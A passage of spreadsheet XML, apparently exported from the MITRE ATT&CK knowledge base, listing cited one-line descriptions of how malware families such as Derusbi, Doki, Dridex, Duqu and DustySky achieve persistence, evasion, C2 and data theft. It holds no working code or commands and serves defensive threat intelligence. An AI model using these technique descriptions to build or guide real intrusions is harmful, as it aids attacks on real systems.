    <t>[Denis](https://attack.mitre.org/software/S0354) obfuscates its code and encrypts the API names. [Denis](https://attack.mitre.org/software/S0354) also encodes its payload in Base64.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has a version written in PowerShell.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) queries the Registry for keys and values.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) encodes the data sent to the server in Base64.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) collects OS information and the computer name from the victim’s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) uses &lt;code&gt;ipconfig&lt;/code&gt; to gather the IP address from the system.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) enumerates and collects the username from the victim’s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) can launch a remote shell to execute arbitrary commands on the victim’s machine.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of performing audio captures.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) injects itself into the secure shell (SSH) process.(Citation: Airbus Derusbi 2015)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) uses a backup communication method with an HTTP beacon.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of obtaining directory, file, and drive listings.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of logging keystrokes.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) binds to a raw socket on a random source port between 31800 and 31900 for C2.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) has used unencrypted HTTP on port 443 for C2.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) collects current and parent process IDs.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of enumerating Registry keys and values.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.(Citation: ThreatGeek Derusbi Converge)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of performing screen captures.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) obfuscates C2 traffic with variable 4-byte XOR keys.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>A Linux version of [Derusbi](https://attack.mitre.org/software/S0021) checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. [Derusbi](https://attack.mitre.org/software/S0021) also gathers the username of the victim.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>The [Derusbi](https://attack.mitre.org/software/S0021) malware supports timestomping.(Citation: Novetta-Axiom)(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of creating a remote Bash shell and executing commands.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of capturing video.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can download remote files.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) encodes C2 traffic with base64.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) encrypts C2 data with AES256 in ECB mode.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) uses HTTP for C2.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can spawn remote shells.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>A [Dipsind](https://attack.mitre.org/software/S0200) variant registers as a Winlogon Event Notify DLL to establish persistence.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to create a login item for persistence.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) prompts the user for credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) installs a root certificate to aid in man-in-the-middle actions.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) persists via a Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) downloads and installs Tor via homebrew.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>Plist Modification</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) persists via a plist login item.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the embedTLS library for network communications.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) was run through a deployed container.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the DynDNS service and a DGA based on the Dogecoin blockchain to generate C2 domains.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600)’s container was configured to bind the host root directory.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used Ngrok to establish C2 and exfiltrate data.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) was executed through an open Docker daemon API port.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has resolved the path of a process PID to use as a script argument.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has downloaded scripts from C2.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has disguised a file as a Linux kernel module.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has searched for the current process’s PID.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has executed shell scripts with /bin/sh.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has communicated with C2 over HTTPS.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the dogechain.info API to generate a C2 address.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses PowerShell for execution.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) searches and reads the value of the Windows Update Registry Run key.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses PowerShell to add a Registry Run key in order to establish persistence.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) collects the victim host name and serial number, and then sends the information to the C2 server.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) collects the victim username and sends it to the C2 server.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) communicates to its C2 server over HTTP.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses the command line.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) bypasses UAC to escalate privileges by using a custom “RedirectEXE” shim database.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>After downloading its main config file, [Downdelph](https://attack.mitre.org/software/S0134) downloads multiple payloads from C2 servers.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) uses RC4 to encrypt C2 responses.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has encrypted traffic with RSA.(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.(Citation: Dell Dridex Oct 2015)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers.(Citation: Dell Dridex Oct 2015)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) contains a module for VNC.(Citation: Dell Dridex Oct 2015)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has encrypted traffic with RC4.(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has used HTTPS for C2 communications.(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can unarchive data downloaded from the C2 to obtain the payload and persistence modules.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) has used legitimate web services to exfiltrate data.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can collect the names of all files and folders in the Program Files directories.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) can download and execute additional files.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) has checked for the presence of Arabic language in the infected machine's settings.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) can communicate with its operators by exploiting the Simplenote, DropBox, and the social media platform, Facebook, where it can create fake accounts to control the backdoor and receive instructions.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can execute arbitrary shell commands on the victims' machines.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can transfer files from the victim machine.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has de-obsfuscated XOR encrypted payloads in WebSocket messages.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can exfiltrate files over C2 infrastructure.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can delete specific files from a compromised host.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can download files to a compromised host.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use a port forwarding rule on its agent module to relay network traffic through the client module to a remote host on the same network.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use kernel modules to establish persistence.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use TCP to communicate between its agent and client modules.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has used XOR encrypted payloads in WebSocket client to server messages.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can execute arbitrary commands as root on a compromised system.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) packs collected data into a password protected archive.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s RAT makes a persistent target file with auto execution on the host start.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can retrieve browser history.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect a variety of information from victim machines.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used a decryption routine that is part of an executable physical patch.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can remove its persistence and delete itself.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can list files on available disk volumes.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>One of [Dtrack](https://attack.mitre.org/software/S0567) can replace the normal flow of a program execution with malicious code.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s can download and upload a file to the victim’s computer.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s dropper contains a keylogging executable.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can save collected data to disk, different file formats, and network shares.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>One of [Dtrack](https://attack.mitre.org/software/S0567) can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used a dropper that embeds an encrypted payload as extra data.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s dropper can list all running processes.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used process hollowing shellcode to target a predefined list of processes from &lt;code&gt;%SYSTEM32%&lt;/code&gt;.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the RegisteredOwner, RegisteredOrganization, and InstallDate registry values.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) contains a function that calls &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt;.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the victim's computer name, hostname and adapter information to create a unique identifier.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the host's IP addresses using the &lt;code&gt;ipconfig&lt;/code&gt; command.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect network and active connection information.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) used hard-coded credentials to gain access to a network share.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used &lt;code&gt;cmd.exe&lt;/code&gt; to add a persistent service.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can add a service called WBService to establish persistence.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.(Citation: Kaspersky Duqu 2.0)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on open windows.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>Modules can be pushed to and executed by [Duqu](https://attack.mitre.org/software/S0038) that copy data to a staging area, compress it, and XOR encrypt it.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host).(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) can track key presses with a keylogger module.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on accounts and permissions.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) has used &lt;code&gt;msiexec&lt;/code&gt; to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.(Citation: Kaspersky Duqu 2.0)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on process details.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) is capable of loading executable code via process hollowing.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>Adversaries can instruct [Duqu](https://attack.mitre.org/software/S0038) to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>When the [Duqu](https://attack.mitre.org/software/S0038) command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The [Duqu](https://attack.mitre.org/software/S0038) command and control protocol's data stream can be encrypted with AES-CBC.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The reconnaissance modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on network configuration.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on network connections.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can compress files via RAR while staging data to be exfiltrated.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has exfiltrated data to the C2 server.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can delete files it creates from the infected system.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) contains a keylogger.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) searches for network drives and removable media and duplicates itself onto them.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) created folders in temp directories to host collected files before exfiltration.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>The [DustySky](https://attack.mitre.org/software/S0062) dropper uses a function to obfuscate the name of functions and other parts of the malware.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can detect connected USB devices.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) collects information about running processes from victims.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) achieves persistence by creating a Registry entry in &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) searches for removable media and duplicates itself onto it.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) captures PNG screenshots of the main screen.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) checks for the existence of anti-virus.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) lists all installed software for the infected machine.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) extracts basic information about the operating system.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has used both HTTP and HTTPS for C2.(Citation: DustySky)</t>
  </si>
  <si>
    <t>The [DustySky](https://attack.mitre.org/software/S0062) dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) decrypts resources needed for targeting the victim.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) injects into other processes to load modules.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to send information staged on a compromised host externally to C2.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has a command to download and executes additional files.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to create files in a TEMP folder to act as a database to store information.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to directly inject its code into the web browser process.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify installed programs on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has been delivered with encrypted resources and must be unpacked for execution.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) can detect sandbox analysis environments by inspecting the process list and Registry.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the computer name, OS version, and hardware configuration on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify network settings on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the users on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify running services on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">[Dyre](https://attack.mitre.org/software/S0024) uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)  </t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) registers itself as a service by adding several Registry keys.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can delete log files generated from the malware stored at &lt;code&gt;C:\windows\temp\tmp0207&lt;/code&gt;.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can capture and store keystrokes.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) has stored keystrokes and screenshots within the &lt;code&gt;%temp%\GoogleChrome&lt;/code&gt;, &lt;code&gt;%temp%\Downloads&lt;/code&gt;, and &lt;code&gt;%temp%\TrendMicroUpdate&lt;/code&gt; directories.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) has encrypted strings with RC4.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
